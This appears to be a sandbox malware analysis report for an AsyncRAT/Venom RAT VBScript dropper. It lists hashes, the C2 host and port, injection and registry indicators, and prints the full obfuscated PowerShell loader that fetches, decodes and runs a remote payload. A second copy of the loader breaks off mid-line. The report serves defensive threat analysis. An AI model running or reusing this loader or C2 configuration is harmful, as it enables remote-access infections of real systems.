asyncrat | 255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6

Analysis

max time kernel
240s
max time network
250s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
24-05-2024 01:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

download.vbs
Size

897KB
MD5

c983e816294b2d4c2213db5bc4339393
SHA1

4eb96d15af10865ac93ed29ec475bb8eafe91ea3
SHA256

255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6
SHA512

fac24fd9947e732069c7a3fdcb91376ace629ace66b1e0f9fb384b9ca03725c7f39b8f817c4bea4593595f30ebb67083fbafaebe61bfc59a3176caddf3aeaecb
SSDEEP

12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp90:UXh+k+taGKqoJO0

Score

10^/10

asyncrat venom clients rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

xvern429.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

5 2572 powershell.exe
7 2572 powershell.exe
9 2572 powershell.exe
11 2572 powershell.exe
13 2572 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs

Processes:

wab.exewab.exewab.exewab.exe

pid process

1232 wab.exe
2592 wab.exe
1976 wab.exe
2908 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

powershell.exewab.exepowershell.exepowershell.exewab.exewab.exepowershell.exewab.exe

pid process

584 powershell.exe
1232 wab.exe
1968 powershell.exe
2756 powershell.exe
2592 wab.exe
1976 wab.exe
2880 powershell.exe
2908 wab.exe

flow	pid	process
5	2572	powershell.exe
7	2572	powershell.exe
9	2572	powershell.exe
11	2572	powershell.exe
13	2572	powershell.exe

pid	process
1232	wab.exe
2592	wab.exe
1976	wab.exe
2908	wab.exe

pid	process
584	powershell.exe
1232	wab.exe
1968	powershell.exe
2756	powershell.exe
2592	wab.exe
1976	wab.exe
2880	powershell.exe
2908	wab.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 584 set thread context of 1232	584	powershell.exe	wab.exe
PID 1968 set thread context of 2592	1968	powershell.exe	wab.exe
PID 2756 set thread context of 1976	2756	powershell.exe	wab.exe
PID 2880 set thread context of 2908	2880	powershell.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

taskmgr.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TypedURLs	taskmgr.exe

Modifies registry class 24 IoCs

Processes:

taskmgr.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\NodeSlot = "3"	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000000000001000000ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0 = 4a0031000000000000000000102054656d700000360008000400efbe00000000000000002a00000000000000000000000000000000000000000000000000540065006d007000000014000000	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\MRUListEx = ffffffff	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 = 7e0074001c0043465346160031000000000000000000100041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f3c0008000400efbe00000000000000002a000000000000000000000000000000000000000000000000004100700070004400610074006100000042000000	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 00000000ffffffff	taskmgr.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\MRUListEx = 00000000ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f44471a0359723fa74489c55595fe6b30ee0000	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0 = 4c003100000000000000000010004c6f63616c00380008000400efbe00000000000000002a000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exepowershell.exepowershell.exe

pid	process
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2572	powershell.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
584	powershell.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
584	powershell.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

2108 taskmgr.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

584 powershell.exe
1968 powershell.exe
2756 powershell.exe
2880 powershell.exe

pid	process
584	powershell.exe
1968	powershell.exe
2756	powershell.exe
2880	powershell.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

taskmgr.exepowershell.exepowershell.exeAUDIODG.EXEpowershell.exepowershell.exepowershell.exepowershell.exewab.exewab.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exe

description	pid	process
Token: SeDebugPrivilege	2108	taskmgr.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	584	powershell.exe
Token: 33	2884	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2884	AUDIODG.EXE
Token: 33	2884	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2884	AUDIODG.EXE
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	2592	wab.exe
Token: SeDebugPrivilege	1976	wab.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2908	wab.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe
2108	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exepowershell.exeWScript.exepowershell.exepowershell.exeWScript.exepowershell.exepowershell.exeWScript.exepowershell.exe

description	pid	process	target process
PID 1760 wrote to memory of 2572	1760	WScript.exe	powershell.exe
PID 1760 wrote to memory of 2572	1760	WScript.exe	powershell.exe
PID 1760 wrote to memory of 2572	1760	WScript.exe	powershell.exe
PID 2572 wrote to memory of 2456	2572	powershell.exe	cmd.exe
PID 2572 wrote to memory of 2456	2572	powershell.exe	cmd.exe
PID 2572 wrote to memory of 2456	2572	powershell.exe	cmd.exe
PID 2572 wrote to memory of 584	2572	powershell.exe	powershell.exe
PID 2572 wrote to memory of 584	2572	powershell.exe	powershell.exe
PID 2572 wrote to memory of 584	2572	powershell.exe	powershell.exe
PID 2572 wrote to memory of 584	2572	powershell.exe	powershell.exe
PID 584 wrote to memory of 2732	584	powershell.exe	cmd.exe
PID 584 wrote to memory of 2732	584	powershell.exe	cmd.exe
PID 584 wrote to memory of 2732	584	powershell.exe	cmd.exe
PID 584 wrote to memory of 2732	584	powershell.exe	cmd.exe
PID 584 wrote to memory of 1232	584	powershell.exe	wab.exe
PID 584 wrote to memory of 1232	584	powershell.exe	wab.exe
PID 584 wrote to memory of 1232	584	powershell.exe	wab.exe
PID 584 wrote to memory of 1232	584	powershell.exe	wab.exe
PID 584 wrote to memory of 1232	584	powershell.exe	wab.exe
PID 584 wrote to memory of 1232	584	powershell.exe	wab.exe
PID 1604 wrote to memory of 1268	1604	WScript.exe	powershell.exe
PID 1604 wrote to memory of 1268	1604	WScript.exe	powershell.exe
PID 1604 wrote to memory of 1268	1604	WScript.exe	powershell.exe
PID 1268 wrote to memory of 2252	1268	powershell.exe	cmd.exe
PID 1268 wrote to memory of 2252	1268	powershell.exe	cmd.exe
PID 1268 wrote to memory of 2252	1268	powershell.exe	cmd.exe
PID 1268 wrote to memory of 1968	1268	powershell.exe	powershell.exe
PID 1268 wrote to memory of 1968	1268	powershell.exe	powershell.exe
PID 1268 wrote to memory of 1968	1268	powershell.exe	powershell.exe
PID 1268 wrote to memory of 1968	1268	powershell.exe	powershell.exe
PID 1968 wrote to memory of 1744	1968	powershell.exe	cmd.exe
PID 1968 wrote to memory of 1744	1968	powershell.exe	cmd.exe
PID 1968 wrote to memory of 1744	1968	powershell.exe	cmd.exe
PID 1968 wrote to memory of 1744	1968	powershell.exe	cmd.exe
PID 2360 wrote to memory of 2152	2360	WScript.exe	powershell.exe
PID 2360 wrote to memory of 2152	2360	WScript.exe	powershell.exe
PID 2360 wrote to memory of 2152	2360	WScript.exe	powershell.exe
PID 2152 wrote to memory of 2192	2152	powershell.exe	cmd.exe
PID 2152 wrote to memory of 2192	2152	powershell.exe	cmd.exe
PID 2152 wrote to memory of 2192	2152	powershell.exe	cmd.exe
PID 2152 wrote to memory of 2756	2152	powershell.exe	powershell.exe
PID 2152 wrote to memory of 2756	2152	powershell.exe	powershell.exe
PID 2152 wrote to memory of 2756	2152	powershell.exe	powershell.exe
PID 2152 wrote to memory of 2756	2152	powershell.exe	powershell.exe
PID 2756 wrote to memory of 2520	2756	powershell.exe	cmd.exe
PID 2756 wrote to memory of 2520	2756	powershell.exe	cmd.exe
PID 2756 wrote to memory of 2520	2756	powershell.exe	cmd.exe
PID 2756 wrote to memory of 2520	2756	powershell.exe	cmd.exe
PID 1968 wrote to memory of 2592	1968	powershell.exe	wab.exe
PID 1968 wrote to memory of 2592	1968	powershell.exe	wab.exe
PID 1968 wrote to memory of 2592	1968	powershell.exe	wab.exe
PID 1968 wrote to memory of 2592	1968	powershell.exe	wab.exe
PID 1968 wrote to memory of 2592	1968	powershell.exe	wab.exe
PID 1968 wrote to memory of 2592	1968	powershell.exe	wab.exe
PID 2756 wrote to memory of 1976	2756	powershell.exe	wab.exe
PID 2756 wrote to memory of 1976	2756	powershell.exe	wab.exe
PID 2756 wrote to memory of 1976	2756	powershell.exe	wab.exe
PID 2756 wrote to memory of 1976	2756	powershell.exe	wab.exe
PID 2756 wrote to memory of 1976	2756	powershell.exe	wab.exe
PID 2756 wrote to memory of 1976	2756	powershell.exe	wab.exe
PID 2656 wrote to memory of 2548	2656	WScript.exe	powershell.exe
PID 2656 wrote to memory of 2548	2656	WScript.exe	powershell.exe
PID 2656 wrote to memory of 2548	2656	WScript.exe	powershell.exe
PID 2548 wrote to memory of 932	2548	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\download.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
3⤵
PID:2456

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks 